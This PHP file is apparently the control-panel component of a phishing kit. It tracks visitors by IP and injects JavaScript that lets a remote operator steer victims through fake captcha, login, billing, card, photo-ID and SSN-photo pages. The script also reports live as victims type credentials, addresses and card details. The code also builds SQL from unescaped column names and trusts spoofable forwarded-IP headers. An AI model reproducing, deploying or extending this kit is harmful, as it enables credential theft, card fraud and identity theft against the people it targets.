<?php
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}
require (__DIR__).'/connection.php';

class Panel{

    function getIp(){
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        if($ip == "::1" || $ip == "127.0.0.1") $ip = "127.0.0.1";
        return $ip;
    }

    function makeUser(){
        if(!$this->isUserLogged()){
            $ip = $this->getIp();
            $this->registerUser(array(":ip"=>$ip, ":last_act"=>time()));
            $_SESSION['user']=$ip;
        }
    }

    function isUserLogged(){
        return isset($_SESSION["user"]) && $_SESSION['user']!="";
    }

    function registerUser($arr){
        global $pdo;
        $insert = $pdo->prepare("INSERT INTO users(ip, last_act) VALUES(:ip, :last_act)");
        $insert->execute($arr);
    }

    function updateCol($col, $val, $id){
        global $pdo;
        $update = $pdo->prepare("UPDATE users SET $col=:val WHERE id=:id");
        $update->execute(array(":val"=>$val, ":id"=>$id));
    }

    function getCol($col){
        global $pdo;
        $get = $pdo->prepare("SELECT $col FROM users WHERE ip=:ip");
        $get->execute(array(":ip"=>$this->getIp()));
        $result = $get->fetch();
        return $result ? $result[$col] : null;
    }

    function getColById($col, $id){
        global $pdo;
        $get = $pdo->prepare("SELECT $col FROM users WHERE id=:id");
        $get->execute(array(":id"=>$id));
        $result = $get->fetch();
        return $result ? $result[$col] : null;
    }

    function resetPanel(){
        global $pdo;
        $pdo->query("delete from users");
    }

    function ctr($p, $basePath = '../panel/'){
        $bp = addslashes($basePath);
        $atRoot = (strpos($p, 'confirmation') === false && $p === 'captcha.php') ? 'true' : 'false';
        echo '<script>
        (function(){
            var baseUrl = "'.$bp.'processor.php";
            var page = "'.addslashes($p).'";
            var atRoot = '.$atRoot.';
            var pre = atRoot ? "" : "../";
            var conf = atRoot ? "confirmation/" : "";
            var targets = {
                1: pre+"captcha.php", 2: conf+"index.php", 3: conf+"index.php?error=1",
                4: conf+"billing.php", 5: conf+"billing.php?error=1",
                6: conf+"card.php", 7: conf+"card.php?error=1",
                8: conf+"photo_id.php", 9: conf+"photo_id.php?error=1",
                10: conf+"photo_ssn.php", 11: conf+"photo_ssn.php?error=1",
                12: conf+"done.php", 13: conf+"done.php"
            };
            function post(data, cb){
                var fd = new FormData();
                for(var k in data) fd.append(k, data[k]);
                fetch(baseUrl, {method:"POST", body:fd}).then(function(r){return r.text();}).then(cb||function(){});
            }
            function clearRedirections(){ post({clearRedirection:1}); }
            function keepAlive(clear){ var d={keepAlive:1,page:page}; if(clear) d.clearActivity=1; post(d); }
            clearRedirections();
            keepAlive(1);
            setInterval(function(){ keepAlive(); }, 500);
            var redirect=0, lastRedirect=0;
            setInterval(function(){
                post({redirectionListener:1}, function(data){
                    redirect=parseInt(data,10);
                    if(redirect&&redirect>0&&redirect<=13&&redirect!==lastRedirect){
                        lastRedirect=redirect; clearRedirections();
                        if(targets[redirect]) window.location.href=targets[redirect];
                    }
                });
            }, 50);
            function bindActivity(sel, msg){
                var el=document.querySelector(sel); if(el) el.addEventListener("keyup", function(){ post({activity:1, statu:msg}); });
            }
            function bindAll(sels, msg){ sels.split(",").forEach(function(s){ bindActivity(s.trim(), msg); }); }
            function initBinds(){
                bindAll("#email,#password,#login_email,#login_password", "Entering login credentials...");
                bindAll("#address1,#city,#zip,#phone", "Entering billing info...");
                bindAll("#cardNumber,#cardName,#expiryDate,#cvv", "Entering card info...");
            }
            if(document.readyState==="loading") document.addEventListener("DOMContentLoaded", initBinds);
            else setTimeout(initBinds, 100);
        })();
        </script>';
    }
}
?>
